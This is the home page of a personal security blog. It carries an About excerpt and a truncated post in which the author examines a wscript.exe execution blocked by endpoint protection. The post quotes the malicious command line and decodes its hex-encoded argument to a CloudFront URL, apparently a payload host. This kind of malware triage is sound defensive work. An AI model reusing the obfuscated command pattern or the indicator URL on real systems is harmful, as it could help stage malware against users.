Home

Welcome to niem.es

Some musings on (mostly) security related topics.

Latest from the Blog

About:me

I’m a dedicated father and friend. I enjoy technology immensely and feel extremely lucky to have been born at the right place & during the right time. I started out working for the University of Dayton as a co-op student in computer science. I fell in love with the concept of networking – this wasContinue reading “About:me”

Examining strange wscript behavior

We use cylance with script control, and periodically I review the outliers that have been blocked. I came across this one recently: wscript.exe “C:ProgramData{18E0DD83-92A2-5745-1464-C9078E2642C9}domo.txt” “68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574” “//B” “//E:jscript” “–IsErIk” I took a copy of the domo.txt script and uploaded to VT: I also ran that hex string through a hex decoder: 68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e = https://d274eq41c39r2n.cloudfront.net According toContinue reading “Examining strange wscript behavior”

Get new content delivered directly to your inbox.